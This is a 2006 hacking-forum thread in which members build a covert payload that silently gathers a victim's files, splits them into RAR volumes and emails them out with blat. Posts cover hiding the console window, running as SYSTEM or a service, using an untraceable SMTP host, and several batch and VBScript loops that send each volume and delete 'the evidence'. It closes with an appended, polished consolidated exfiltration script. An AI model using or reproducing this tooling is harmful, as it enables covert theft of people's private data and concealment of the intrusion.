Guest Posted September 28, 2006
I wouldn't use a bat script to do this, as it's going to be hard to actually hide the bat script's window. Any user is going to notice a window pop up and close. Does it have to send all that data at once though? I mean, can't you split all the data into very small chunks and every 30 mins or so send one chunk?
pseudobreed Posted September 28, 2006
It almost sounds like a custom rootkit. Nice. srvany is the application that can turn a batch command into a service. Really easy to set up and I use it all the time. You just have to make sure that all registry settings and application info go into the 'All Users' profiles.

I could never get Blat to auth with Gmail. Gmail kept spitting an error back to me that I had to log in a certain way (I can't remember the exact error off the top of my head). It doesn't accept the auth command that Blat gives off. So, I just signed up with a free SMTP host (inbox.com). It works out because if the user fires up Ethereal and sees where the emails are going it really can not be traced back to me. I'm going to look into what it takes to set up a bare bones SMTP server.

@Spider If you set up a batch schedule with the at command, the batch runs under the SYSTEM account and therefore runs silently. The user never sees the console window. The same thing works if you use srvany to make a service, or you could always call nircmd execcmd.
Darren Kitchen Posted September 28, 2006 Author
OK, so Blat doesn't work with Gmail SMTP out of the box. It doesn't handle SSL correctly. Supposedly stunnel can be used to wrap it correctly. I'm looking for some info on that now. Also turns out that EXACTLY what we need has already been written at: http://weblogs.asp.net/nleghari/articles/gmailbackup.aspx *However*, it requires .NET Framework 2.0, and it adds an icon to the systray. Bummer! Could have been perfect.
pseudobreed Posted September 28, 2006
I'm not 100% sure what you are trying to do; however, you could check out SourceForge for some inspiration. Maybe you can find what you are looking for and port the code.
SomeoneE1se Posted September 28, 2006
Somewhere on this forum someone kept saying something about renaming the .bat to something like .cmd or command or something that starts with a C and reminds me of the word command, and if you do NO window will come up. I remember hearing of this twice but I can't seem to find it anymore.
Ebola Eater of Packets Posted September 28, 2006
Couldn't you just initialize the window in the bottom pixel of the screen?
Darren Kitchen Posted September 28, 2006 Author
Got it working so that once the right parameters are met the data retrieval will begin and invisibly run the batch file. That's part 1. I've got the tools and commands to send email attachments via command line. That's part 3. Now part 2 is rar'ing the files for delivery. Shouldn't be long now.
Darren Kitchen Posted September 28, 2006 Author
OK, I've got everything working now except for one last thing. (I say that now, but once the proof of concept is done you know feature creep will set in.) Anyway, here's the problem, and I'm sure it's something that could be done with a simple loop in batch. I'd R the FM but I'm crashing hard after not sleeping for a few days, so I'll be lazy and ask.

Here's the deal: the hack is done. The goodies have been retrieved, then rar'd for size. To keep things simple we're using email with SSL, which means attachment size needs to be low. If the goodies are less than 5 MB it's no issue, a single rar file will do the trick. But if we've got, say, three 5 MB rar files to email, we'll need a loop. Here's what we've got:

    goodies.r00
    goodies.r01
    goodies.r02

and we need to do this to each file:

    blat.exe <filename> -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

I'm absolutely exhausted. I'm going to crash and pick this back up in the morning. If anyone has a potential solution or suggestion let me know. Oh, and thanks for everyone's input and help on this project. I won't forget your names when doing the segment this weekend.
cooper Posted September 28, 2006
Blat is being run from within a batch script, yes? Doesn't Windows batch script support loops as well?
boristsr Posted September 28, 2006
I think the problem is more that we don't know how many files it will be split into. A possible solution: the Windows Scripting Host provides some rather powerful libraries. Is this an acceptable requirement?
cooper Posted September 28, 2006
Can't you loop over the output of something like '<my_fileset>.*'? Savages! Maybe you can compile a second script from the first script which has that listing added into it?
SomeoneE1se Posted September 28, 2006
This is just a simple batch script. It's been a long time, but it's something like:

    @ECHO OFF
    REM cmd.exe does not take "GOTO x ELSE GOTO y" on one line;
    REM "IF NOT EXIST ... GOTO end" does the same job
    IF NOT EXIST pwned.r00 GOTO end
    :hak1
    REM pwn box more
    REM send e-mail (replace with script to send e-mail, I have no clue about those commands)
    IF NOT EXIST pwned.r01 GOTO end
    :hak2
    REM pwn box more (same)
    IF NOT EXIST pwned.r02 GOTO end
    :hak3
    ...
    REM more hacking code
    ...
    :end
    REM THIS BOX HAS BEEN PWNED BY HAK5.ORG

Someone should check that (that should be right, but I'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5, I can't help but leave easter eggs in my code even if it's a script kiddie egg), and you may not want to add that last REMark.
boristsr Posted September 28, 2006
That code is good, except you either need to have a huge batch script just in case, or there is a large chance you could miss some files. It'd be good if we could iterate over a list as suggested above; however, my batch script ability isn't very strong, so I have no idea if it's feasible in a batch.
SomeoneE1se Posted September 28, 2006
Take a look at fastpush; all that is is just a batch script... or any other program. The idea would be to choose the language to fit the program requirements. Here we need to pass commands to the Windows command line; using a batch script would be the best/fastest way, if not the simplest or smallest code. It works, that's all we need. And this way there's nothing else trying to hide on the computer.
boristsr Posted September 28, 2006
Just had a great idea, modified your code a bit and used something I gleaned from a script in the Switchblade thread:

    @echo off
    ::initial variable values
    ::(no quotes around the value, SET keeps them as part of the string)
    SET n=0
    SET filename=pwned.r
    ::make a two-digit file number from the counter; the counter itself stays
    ::unpadded because SET /A reads a leading zero as octal and rejects "08"
    SET fileNum=0%n%
    SET fileNum=%fileNum:~-2%
    ::make a string containing the complete filename
    SET filenameComplete=%filename%%fileNum%
    ::check to see if the initial file exists, if not, jumps to after the loop
    IF NOT EXIST %filenameComplete% GOTO noFiles
    ::the archive loop
    :processFile
    ::do what we need with it here
    ::perform steps in preparation for next file
    ::increment the file number
    SET /a n=n+1
    ::make the number double digits
    SET fileNum=0%n%
    SET fileNum=%fileNum:~-2%
    ::make a string containing the complete filename
    SET filenameComplete=%filename%%fileNum%
    ::check to see if next file exists and then loop
    ::else continue on
    IF EXIST %filenameComplete% GOTO processFile
    :noFiles
    ::Continue the script

How valid is that? Remember, my batch scripting skills suck.

**edit** Commented it better. Have since tested it; it works, except it executes on the first file regardless, so fixed that too.
**edit 2** Somewhere in my refinements I have broken it. Will have a working version very soon.
**edit 3** Working again, placed a NOT on the wrong IF statement.
PoyBoy Posted September 28, 2006
Batch scripts really seem to look like a pile of shit on a griddle compared to Python... Anyways, I think this is really going to work!
404 Posted September 28, 2006
I'm really looking forward to how this project will turn out. Maybe a bit late, but here's an interesting C script for keylogging and mailing from Irongeek: http://www.irongeek.com/i.php?page=security/keylogger . Probably not useful for this project anymore, but still interesting. Oh, by the way, which C compiler did you use now, Darren?
boristsr Posted September 28, 2006
> Batch scripts really seem to look like a pile of shit on a griddle compared to Python... Anyways, I think this is really going to work!

While I don't disagree, batch scripts do have the advantage of not needing a 10 meg download.
pseudobreed Posted September 28, 2006
Copy and paste the code into goodies.vbs. Call the VBScript on the command line:

    cscript /nologo goodies.vbs {filename*}

It will blat out all the files that match the filename*. Use * as the wildcard. (i.e. cscript /nologo goodies.vbs goodies* - this will send out every file in the folder that matches goodies.*: goodies.rar, goodies.r01, goodies.r02, etc.)

    ' goodies.vbs - run blat on every file in the current folder whose name
    ' matches the wildcard given as the first argument
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set WshShell = CreateObject("WScript.Shell")

    If WScript.Arguments.Count < 1 Then
      WScript.Echo "usage: cscript /nologo goodies.vbs <pattern>"
      WScript.Quit 1
    End If

    i = 0
    ReDim arrFiles(1)
    Set Folder = FSO.GetFolder(".")
    Set Files = Folder.Files
    For Each File in Files
      If CheckFile(File.Name, WScript.Arguments(0)) Then
        If i > UBound(arrFiles) Then ReDim Preserve arrFiles(i*2)
        arrFiles(i) = File.Path
        i = i + 1
      End If
    Next

    ' ReDim Preserve arrFiles(-1) would fail, so bail out if nothing matched
    If i = 0 Then
      WScript.Echo "no files match " & WScript.Arguments(0)
      WScript.Quit 1
    End If
    ReDim Preserve arrFiles(i-1)

    For Each FileName In arrFiles
      'WScript.Echo FileName
      ' VBScript cannot launch a program just by naming it; shell out through
      ' WScript.Shell.Run (window style 0 = no console window, True = wait for exit)
      WshShell.Run "blat.exe """ & FileName & """ -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099", 0, True
    Next

    ' DOS-style wildcard match of Name against Filter ("*" and "?" supported)
    Private Function CheckFile (ByVal Name, ByVal Filter)
      CheckFile = False
      FilterPos = 1
      NamePos = 1
      Do
        If FilterPos > Len(Filter) Then
          CheckFile = NamePos > Len(Name)
          Exit Function
        End If
        If Mid(Filter,FilterPos) = ".*" Then
          If NamePos > Len(Name) Then CheckFile = True
          Exit Function
        End If
        If Mid(Filter,FilterPos) = "." Then
          CheckFile = NamePos > Len(Name)
          Exit Function
        End If
        FilterCount = Mid(Filter,FilterPos,1)
        FilterPos = FilterPos + 1
        Select Case FilterCount
          Case "*"
            CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos)
            Exit Function
          Case "?"
            If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1
          Case Else
            If NamePos > Len(Name) Then Exit Function
            NameCount = Mid(Name,NamePos,1)
            NamePos = NamePos + 1
            If StrComp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function
        End Select
      Loop
    End Function

    ' Handles the part of the pattern after a "*": skip any further wildcards,
    ' then try every position in Name where the next literal could start
    Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)
      FilterPos = FilterPos0
      Do
        If FilterPos > Len(Filter) Then
          CheckFile2 = True
          Exit Function
        End If
        FilterCount2 = Mid(Filter,FilterPos,1)
        FilterPos = FilterPos + 1
        If FilterCount2 <> "*" And FilterCount2 <> "?" Then
          Exit Do
        End If
      Loop
      If FilterCount2 = "." Then
        If Mid(Filter,FilterPos) = "*" Then
          CheckFile2 = True
          Exit Function
        End If
        If FilterPos > Len(Filter) Then
          CheckFile2 = InStr(NamePos0,Name,".") = 0
          Exit Function
        End If
      End If
      For NamePos = NamePos0 To Len(Name)
        NameCount = Mid(Name,NamePos,1)
        If StrComp(FilterCount2,NameCount,vbTextCompare) = 0 Then
          If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then
            CheckFile2 = True
            Exit Function
          End If
        End If
      Next
      CheckFile2 = False
    End Function

I didn't comment anything =/, so if you have any questions just ask and I'll explain. Now you just have to fill in the credentials for Blat and you should be good to go.

*Edit - Added argument option to script.
DLSS Posted September 28, 2006
> SomeoneE1se wrote: (the IF EXIST pwned.r00 / GOTO hak1 sketch quoted from above)

OK, so as cooper said twice, you can loop in the batch script. So instead of creating a new line each time, make the number a variable (r.%part%) and at the end make it add part = part+1, and at your line which looks if it exists make it so when it doesn't exist, stop. This method reduces (if you'd gone with 45) an estimated 120+ lines to an estimated 11 to 25 lines (depending on what you're still going to add in). This for example should work...

    set part=0
    IF NOT EXIST pwned.r00 GOTO end
    GOTO send
    :hak1
    set /a part=%part%+1
    IF NOT EXIST pwned.r%part% goto end
    :send
    blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    del pwned.r%part%
    REM (delete the evidence after sending)
    goto hak1
    :end
    exit
SomeoneE1se Posted September 28, 2006
OK, so I finished my code. I didn't go to 45, but sending 20 files should be enough. I also prepped boristsr's code, but I have NO idea if it will work.

    @ECHO OFF
    REM "IF EXIST x GOTO a ELSE GOTO b" is not valid on one line in cmd.exe,
    REM so each check is written as IF NOT EXIST ... GOTO end
    IF NOT EXIST goodies.r00 GOTO end
    :hak0
    blat.exe goodies.r00 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r01 GOTO end
    :hak1
    blat.exe goodies.r01 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r02 GOTO end
    :hak2
    blat.exe goodies.r02 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r03 GOTO end
    :hak3
    blat.exe goodies.r03 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r04 GOTO end
    :hak4
    blat.exe goodies.r04 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r05 GOTO end
    :hak5
    blat.exe goodies.r05 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r06 GOTO end
    :hak6
    blat.exe goodies.r06 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r07 GOTO end
    :hak7
    blat.exe goodies.r07 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r08 GOTO end
    :hak8
    blat.exe goodies.r08 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r09 GOTO end
    :hak9
    blat.exe goodies.r09 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r10 GOTO end
    :hak10
    blat.exe goodies.r10 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r11 GOTO end
    :hak11
    blat.exe goodies.r11 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r12 GOTO end
    :hak12
    blat.exe goodies.r12 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r13 GOTO end
    :hak13
    blat.exe goodies.r13 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r14 GOTO end
    :hak14
    blat.exe goodies.r14 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r15 GOTO end
    :hak15
    blat.exe goodies.r15 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r16 GOTO end
    :hak16
    blat.exe goodies.r16 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r17 GOTO end
    :hak17
    blat.exe goodies.r17 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r18 GOTO end
    :hak18
    blat.exe goodies.r18 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    IF NOT EXIST goodies.r19 GOTO end
    :hakover
    blat.exe goodies.r19 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    :end
    exit

If you expect to have to send more than 20 files, let me know and I'll update the code for more files. And again, I have no idea if this will work:

    @echo off
    ::the counter stays unpadded: SET /A reads a leading zero as octal and
    ::would reject "08"; the padded copy is only used to build the filename
    SET n=0
    SET rar=goodies.r
    SET rarNum=0%n%
    SET rarNum=%rarNum:~-2%
    SET rarfile=%rar%%rarNum%
    IF NOT EXIST %rarfile% GOTO end
    :hakit
    blat.exe %rarfile% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    ::increment the file number
    SET /a n=n+1
    ::make the number double digits again
    SET rarNum=0%n%
    SET rarNum=%rarNum:~-2%
    SET rarfile=%rar%%rarNum%
    ::check to see if next file exists and then loop
    ::else continue on
    IF EXIST %rarfile% GOTO hakit
    :end
    exit
PoyBoy Posted September 28, 2006
Nice work. I *really* can't wait to see the episode that this is on!
DLSS Posted September 28, 2006
Argh!!! Are you ignoring my last post? This will work, in fewer lines:

    set part=0
    IF NOT EXIST pwned.r00 GOTO end
    GOTO send
    :hak1
    set /a part=%part%+1
    IF NOT EXIST pwned.r%part% goto end
    :send
    blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    del pwned.r%part%
    REM (delete the evidence after sending)
    goto hak1
    :end
    exit
pseudobreed Posted September 28, 2006
> DLSS wrote: (the set /a part=%part%+1 loop quoted from above)

If you do decide to use this, you need to make some changes. WinRAR splits files either by adding part# to the filename or by creating a new file extension such as .r01, .r02, .r03, etc., depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file. So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. I'm not sure what happens if you go into three digits; never had to split a file into that many chunks.
DLSS Posted September 28, 2006
> pseudobreed wrote: (the reply above about WinRAR naming, the .rar first volume and zero padding)

Thanks for the pointers, fixed it to work now (but bummer about the amount of lines):

    REM start at -1 so the first increment gives r00 after pwned.rar has gone
    set part=-1
    IF EXIST pwned.rar GOTO 5end1
    REM if there is no .rar but r00 exists, start the numbered loop (not the .rar send)
    IF EXIST pwned.r00 GOTO hak1
    GOTO end
    :hak1
    set /a part=%part%+1
    IF %part% LSS 10 GOTO less10
    GOTO more10
    :less10
    IF NOT EXIST pwned.r0%part% GOTO end
    GOTO sendless10
    :more10
    IF NOT EXIST pwned.r%part% GOTO end
    GOTO send
    :5end1
    blat.exe pwned.rar -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    del pwned.rar
    REM (delete the evidence after sending)
    goto hak1
    :sendless10
    blat.exe pwned.r0%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    del pwned.r0%part%
    REM (delete the evidence after sending)
    goto hak1
    :send
    blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    del pwned.r%part%
    REM (delete the evidence after sending)
    goto hak1
    :end
    exit

At this point gmullens' last small bit would probably be better as it's fewer lines of code... (though I don't know the issues...)
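Editor's note, added example (not posted by anyone in the thread): the loop below collects the points raised above into one script. It handles an unknown number of volumes (boristsr's concern), sends the .rar first volume before the .r00/.r01 series and zero-pads the counter (pseudobreed's two points), avoids the cmd.exe pitfall where SET /A reads a zero-padded "08" as an invalid octal number, and also covers WinRAR's other naming scheme (name.part01.rar) with a wildcard so the digit count never has to be guessed. Assumptions, labelled in the code: the archive base name is passed as the first argument, the volumes sit in the current directory, and the transport is the blat command line used throughout the thread, whose 127.0.0.1:1099 target is taken to be the local stunnel listener Darren mentions.

```batch
@echo off
setlocal EnableExtensions
:: Added example, not from the thread. Sends every volume of a split RAR set
:: in order without knowing in advance how many volumes there are.
:: Assumptions: %1 is the archive base name (for the thread's files: goodies),
:: the volumes are in the current directory, and the blat line is the one the
:: thread uses; 127.0.0.1:1099 is assumed to be a local stunnel listener.

if "%~1"=="" (
    echo usage: %~nx0 basename
    exit /b 1
)
set "base=%~1"
set sent=0

:: Old-style WinRAR naming: base.rar first, then base.r00, base.r01, ...
if exist "%base%.rar" call :send "%base%.rar"

:: Keep the counter unpadded. SET /A treats a leading zero as octal, so
:: incrementing "08" or "09" directly would fail. The padded copy is only
:: used to build the file name.
set /a n=0
:oldstyle
set "pad=0%n%"
set "vol=%base%.r%pad:~-2%"
if not exist "%vol%" goto newstyle
call :send "%vol%"
set /a n+=1
if %n% LSS 100 goto oldstyle

:newstyle
:: New-style naming: base.part1.rar, base.part01.rar or base.part001.rar.
:: The wildcard avoids guessing the digit count. dir /on gives a defined
:: order; a plain FOR over a wildcard returns filesystem order, which on
:: FAT-formatted USB media is creation order, not alphabetical.
for /f "delims=" %%F in ('dir /b /on "%base%.part*.rar" 2^>nul') do call :send "%%F"

echo %sent% volume(s) sent
exit /b 0

:send
:: %~1 is the volume to send. One subroutine so the transport lives in one place.
echo sending %~1
blat.exe "%~1" -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
if errorlevel 1 (
    echo blat returned an error for %~1 1>&2
) else (
    set /a sent+=1
)
exit /b
```

Run it as `sendvolumes.cmd goodies` from the directory holding the volumes. Because every volume goes through the single :send label, swapping the transport (a different SMTP relay, or the stunnel port) is a one-line change, and a failed send is reported per volume instead of silently dropping part of the set.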